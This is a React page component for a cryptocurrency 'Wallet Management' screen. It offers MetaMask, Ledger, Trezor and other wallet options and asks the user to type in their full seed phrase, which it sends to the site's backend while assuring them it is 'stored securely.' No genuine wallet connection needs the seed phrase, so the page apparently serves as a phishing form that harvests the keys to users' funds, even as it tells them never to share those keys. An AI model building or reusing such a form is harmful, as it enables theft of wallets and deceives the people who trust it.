// src/pages/Wallet.tsx
import React, { useState, useEffect } from "react";
import { useDispatch, useSelector } from "react-redux";
import { RootState } from "../redux/store";
import {
  connectWallet,
  disconnectWallet,
  getWallet,
} from "../redux/slices/walletSlice";
import { GlobalStyles } from "../styles/globalStyles";
import {
  Wallet as WalletIcon,
  AlertTriangle,
  CheckCircle,
  Key,
  Shield,
  ChevronDown,
  Sparkles,
} from "lucide-react";
import toast from "react-hot-toast";

const WALLET_OPTIONS = [
  {
    id: "metamask",
    name: "MetaMask",
    description: "Browser extension wallet",
    icon: "🦊",
  },
  {
    id: "trustwallet",
    name: "Trust Wallet",
    description: "Mobile wallet with multi-chain support",
    icon: "🔒",
  },
  {
    id: "ledger",
    name: "Ledger",
    description: "Hardware wallet for maximum security",
    icon: "💎",
  },
  {
    id: "trezor",
    name: "Trezor",
    description: "Hardware wallet with advanced security",
    icon: "🛡️",
  },
  {
    id: "exodus",
    name: "Exodus",
    description: "Desktop & mobile wallet with built-in exchange",
    icon: "🚀",
  },
  {
    id: "phantom",
    name: "Phantom",
    description: "Solana & Ethereum wallet",
    icon: "👻",
  },
  {
    id: "coinbase",
    name: "Coinbase Wallet",
    description: "From Coinbase exchange",
    icon: "🏦",
  },
  {
    id: "custom",
    name: "Custom Wallet",
    description: "Other wallet or self-custody solution",
    icon: "⚙️",
  },
];

const Wallet: React.FC = () => {
  const dispatch = useDispatch();
  const { wallet, isLoading } = useSelector((state: RootState) => state.wallet);
  const { user } = useSelector((state: RootState) => state.auth);
  const [seedPhrase, setSeedPhrase] = useState("");
  const [selectedWallet, setSelectedWallet] = useState("");
  const [customWalletName, setCustomWalletName] = useState("");
  const [isDropdownOpen, setIsDropdownOpen] = useState(false);

  useEffect(() => {
    if (user?.wallet_connected && !wallet) {
      dispatch(getWallet() as any);
    }
  }, [user, wallet, dispatch]);

  const handleConnect = async (e: React.FormEvent) => {
    e.preventDefault();

    let walletNameToUse = selectedWallet;
    if (selectedWallet === "custom") {
      if (!customWalletName.trim()) {
        toast.error("Please enter a name for your custom wallet");
        return;
      }
      walletNameToUse = customWalletName;
    }

    if (!selectedWallet || !seedPhrase) {
      toast.error("Please select a wallet type and enter your seed phrase");
      return;
    }

    try {
      await dispatch(
        connectWallet({
          wallet_name: walletNameToUse,
          seed_phrase: seedPhrase,
        }) as any,
      );
      toast.success("Wallet connected successfully!");
      setSeedPhrase("");
      setSelectedWallet("");
      setCustomWalletName("");
    } catch (error) {
      toast.error("Failed to connect wallet");
    }
  };

  const handleDisconnect = async () => {
    if (window.confirm("Are you sure you want to disconnect your wallet?")) {
      try {
        await dispatch(disconnectWallet() as any);
        toast.success("Wallet disconnected successfully!");
      } catch (error) {
        toast.error("Failed to disconnect wallet");
      }
    }
  };

  const getSelectedWalletInfo = () => {
    return WALLET_OPTIONS.find((wallet) => wallet.id === selectedWallet);
  };

  if (isLoading) {
    return (
      <div className="flex h-64 items-center justify-center">
        <div className="relative">
          <div className="absolute -inset-4 bg-gradient-to-r from-primary/10 via-primary/5 to-transparent rounded-3xl blur-xl opacity-70"></div>
          <div
            className={`${GlobalStyles.spinner} h-10 w-10 border-3 relative`}
          ></div>
        </div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gradient-to-br from-gray-50 via-gray-100 to-gray-200 dark:from-gray-900 dark:via-gray-800 dark:to-gray-950">
      <div className="p-4 lg:p-5">
        {/* Header */}
        <div className="mb-8">
          <div className="flex items-center gap-2 mb-1">
            <h1 className="text-2xl font-bold bg-gradient-to-r from-gray-900 to-gray-700 dark:from-gray-100 dark:to-gray-300 bg-clip-text text-transparent">
              Wallet Management
            </h1>
            <Sparkles className="h-4 w-4 text-primary/60" />
          </div>
          <p className="text-gray-500 dark:text-gray-400">
            Connect and manage your cryptocurrency wallet securely
          </p>
        </div>

        {wallet ? (
          <div className="space-y-4">
            {/* Wallet Connected Card */}
            <div className="bg-white/90 dark:bg-gray-800/90 backdrop-blur-xl rounded-xl border border-gray-200/30 dark:border-gray-700/30 p-5 shadow-lg">
              <div className="flex items-center justify-between mb-6">
                <div className="flex items-center">
                  <div className="p-3 rounded-lg bg-gradient-to-br from-primary/20 to-primary/10">
                    <WalletIcon className="h-6 w-6 text-primary" />
                  </div>
                  <div className="ml-4">
                    <h3 className="text-lg font-semibold bg-gradient-to-r from-gray-900 to-gray-700 dark:from-gray-100 dark:to-gray-300 bg-clip-text text-transparent">
                      {wallet.wallet_name}
                    </h3>
                    <p className="text-sm text-gray-500 dark:text-gray-400">
                      Connected on{" "}
                      {new Date(wallet.created_at).toLocaleDateString()}
                    </p>
                  </div>
                </div>
                <span
                  className={`${GlobalStyles.badge} ${GlobalStyles.badgeSuccess} px-2 py-0.5`}
                >
                  Connected
                </span>
              </div>

              {/* Wallet Information */}
              <div className="grid grid-cols-1 md:grid-cols-2 gap-3 mb-6">
                <div className="p-4 bg-gray-50/50 dark:bg-gray-800/50 rounded-lg">
                  <div className="flex items-center mb-2">
                    <Key className="h-4 w-4 text-gray-400 mr-2" />
                    <p className="text-sm text-gray-500 dark:text-gray-400">
                      Connection Status
                    </p>
                  </div>
                  <div className="flex items-center">
                    <div className="w-2 h-2 bg-green-500 rounded-full mr-2"></div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Active
                    </p>
                  </div>
                </div>
                <div className="p-4 bg-gray-50/50 dark:bg-gray-800/50 rounded-lg">
                  <div className="flex items-center mb-2">
                    <Shield className="h-4 w-4 text-gray-400 mr-2" />
                    <p className="text-sm text-gray-500 dark:text-gray-400">
                      Type
                    </p>
                  </div>
                  <p className="font-medium text-gray-900 dark:text-white">
                    Multi-chain Wallet
                  </p>
                </div>
              </div>

              {/* Actions */}
              <div className="flex flex-wrap gap-3">
                <button
                  onClick={handleDisconnect}
                  className={`${GlobalStyles.button} ${GlobalStyles.buttonDanger} ${GlobalStyles.buttonMedium} group`}
                >
                  <span>Disconnect Wallet</span>
                </button>
              </div>
            </div>

            {/* Security Tips */}
            <div className="bg-white/90 dark:bg-gray-800/90 backdrop-blur-xl rounded-xl border border-gray-200/30 dark:border-gray-700/30 p-5 shadow-lg">
              <h3 className="text-lg font-semibold bg-gradient-to-r from-gray-900 to-gray-700 dark:from-gray-100 dark:to-gray-300 bg-clip-text text-transparent mb-6 flex items-center">
                <AlertTriangle className="h-5 w-5 text-yellow-500 mr-2" />
                Wallet Security Tips
              </h3>
              <div className="space-y-3">
                <div className="flex items-start">
                  <CheckCircle className="h-4 w-4 text-green-500 mr-3 mt-0.5 flex-shrink-0" />
                  <div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Never share your seed phrase
                    </p>
                    <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
                      Never share your seed phrase with anyone, including
                      support staff
                    </p>
                  </div>
                </div>
                <div className="flex items-start">
                  <CheckCircle className="h-4 w-4 text-green-500 mr-3 mt-0.5 flex-shrink-0" />
                  <div>
                    <p className="font-medium text-gray-900 dark:text-white">
                      Store securely offline
                    </p>
                    <p className="text-sm text-gray-500 dark:text-gray-400 mt-1">
                      Store your seed phrase in a secure offline location
                    </p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        ) : (
          <div className="bg-white/90 dark:bg-gray-800/90 backdrop-blur-xl rounded-xl border border-gray-200/30 dark:border-gray-700/30 p-6 shadow-lg">
            <div className="text-center mb-8">
              <div className="mx-auto w-20 h-20 bg-gray-100/50 dark:bg-gray-800/50 rounded-full flex items-center justify-center mb-4">
                <WalletIcon className="h-10 w-10 text-gray-400" />
              </div>
              <h3 className="text-xl font-bold bg-gradient-to-r from-gray-900 to-gray-700 dark:from-gray-100 dark:to-gray-300 bg-clip-text text-transparent mb-2">
                Connect Your Wallet
              </h3>
              <p className="text-gray-600 dark:text-gray-400">
                Select your wallet type and connect it to start using our
                platform's features
              </p>
            </div>

            <form onSubmit={handleConnect} className="space-y-5">
              {/* Wallet Type Select */}
              <div className="group">
                <label
                  className={`${GlobalStyles.inputLabel} mb-2 flex items-center gap-1`}
                >
                  <span>Select Wallet Type</span>
                  <Sparkles className="h-3 w-3 text-primary/60" />
                </label>

                <div className="relative">
                  <button
                    type="button"
                    onClick={() => setIsDropdownOpen(!isDropdownOpen)}
                    className={`${GlobalStyles.input} flex items-center justify-between w-full text-left ${
                      !selectedWallet ? "text-gray-400" : ""
                    }`}
                  >
                    <div className="flex items-center">
                      {selectedWallet ? (
                        <>
                          <span className="mr-2 text-lg">
                            {
                              WALLET_OPTIONS.find(
                                (w) => w.id === selectedWallet,
                              )?.icon
                            }
                          </span>
                          <span>
                            {
                              WALLET_OPTIONS.find(
                                (w) => w.id === selectedWallet,
                              )?.name
                            }
                          </span>
                        </>
                      ) : (
                        "Select a wallet type..."
                      )}
                    </div>
                    <ChevronDown
                      className={`h-4 w-4 transition-transform ${isDropdownOpen ? "rotate-180" : ""}`}
                    />
                  </button>

                  {isDropdownOpen && (
                    <div className="absolute z-10 mt-1 w-full bg-white dark:bg-gray-800 border border-gray-200/50 dark:border-gray-700/50 rounded-lg shadow-lg max-h-60 overflow-y-auto backdrop-blur-xl">
                      {WALLET_OPTIONS.map((walletOption) => (
                        <button
                          key={walletOption.id}
                          type="button"
                          onClick={() => {
                            setSelectedWallet(walletOption.id);
                            setIsDropdownOpen(false);
                          }}
                          className={`w-full text-left px-4 py-3 hover:bg-gray-50/50 dark:hover:bg-gray-700/50 transition-colors ${
                            selectedWallet === walletOption.id
                              ? "bg-primary/10 dark:bg-primary/20"
                              : ""
                          }`}
                        >
                          <div className="flex items-center">
                            <span className="text-lg mr-3">
                              {walletOption.icon}
                            </span>
                            <div className="flex-1">
                              <div className="font-medium text-gray-900 dark:text-white">
                                {walletOption.name}
                              </div>
                              <div className="text-xs text-gray-500 dark:text-gray-400 mt-0.5">
                                {walletOption.description}
                              </div>
                            </div>
                          </div>
                        </button>
                      ))}
                    </div>
                  )}
                </div>

                {selectedWallet && (
                  <div className="mt-2 p-3 bg-gray-50/50 dark:bg-gray-800/50 rounded-lg">
                    <p className="text-sm text-gray-600 dark:text-gray-400">
                      Selected:{" "}
                      <span className="font-medium text-gray-900 dark:text-white">
                        {getSelectedWalletInfo()?.name}
                      </span>
                    </p>
                  </div>
                )}
              </div>

              {/* Custom wallet name input */}
              {selectedWallet === "custom" && (
                <div className="animate-fade-in group">
                  <label
                    htmlFor="customWalletName"
                    className={`${GlobalStyles.inputLabel} flex items-center gap-1`}
                  >
                    <span>Custom Wallet Name</span>
                    <Sparkles className="h-3 w-3 text-primary/60" />
                  </label>
                  <input
                    id="customWalletName"
                    type="text"
                    value={customWalletName}
                    onChange={(e) => setCustomWalletName(e.target.value)}
                    className={`${GlobalStyles.input} pl-10 focus:pl-11 transition-all duration-300`}
                    placeholder="Enter your wallet name (e.g., My Hardware Wallet)"
                    required={selectedWallet === "custom"}
                  />
                </div>
              )}

              {/* Seed Phrase */}
              <div className="group">
                <label
                  htmlFor="seedPhrase"
                  className={`${GlobalStyles.inputLabel} flex items-center gap-1`}
                >
                  <span>Seed Phrase</span>
                  <Sparkles className="h-3 w-3 text-primary/60" />
                </label>
                <textarea
                  id="seedPhrase"
                  value={seedPhrase}
                  onChange={(e) => setSeedPhrase(e.target.value)}
                  className={`${GlobalStyles.input} pl-10 focus:pl-11 min-h-[120px] resize-none`}
                  placeholder="Enter your 12 or 24 word seed phrase..."
                  required
                />
                <p className="text-sm text-gray-500 dark:text-gray-400 mt-2">
                  Your seed phrase is encrypted and stored securely.
                </p>
              </div>

              {/* Terms Agreement */}
              <div className="flex items-start">
                <input
                  id="walletTerms"
                  name="walletTerms"
                  type="checkbox"
                  required
                  className="h-4 w-4 text-primary focus:ring-primary border-gray-300 rounded mt-1"
                />
                <label
                  htmlFor="walletTerms"
                  className="ml-2 text-sm text-gray-600 dark:text-gray-400"
                >
                  I understand that I am responsible for the security of my
                  wallet and seed phrase.
                </label>
              </div>

              {/* Connect Button */}
              <div>
                <button
                  type="submit"
                  disabled={isLoading}
                  className={`${GlobalStyles.button} ${GlobalStyles.buttonPrimary} ${GlobalStyles.buttonMedium} w-full group/connect`}
                >
                  {isLoading ? (
                    <div className="flex items-center justify-center">
                      <div
                        className={`${GlobalStyles.spinner} w-4 h-4 mr-2 border-2`}
                      ></div>
                      Connecting...
                    </div>
                  ) : (
                    <div className="flex items-center justify-center">
                      <WalletIcon className="h-4 w-4 mr-2 transition-transform group-hover/connect:-translate-x-0.5" />
                      <span>Connect Wallet</span>
                    </div>
                  )}
                </button>
              </div>
            </form>
          </div>
        )}
      </div>
    </div>
  );
};

export default Wallet;
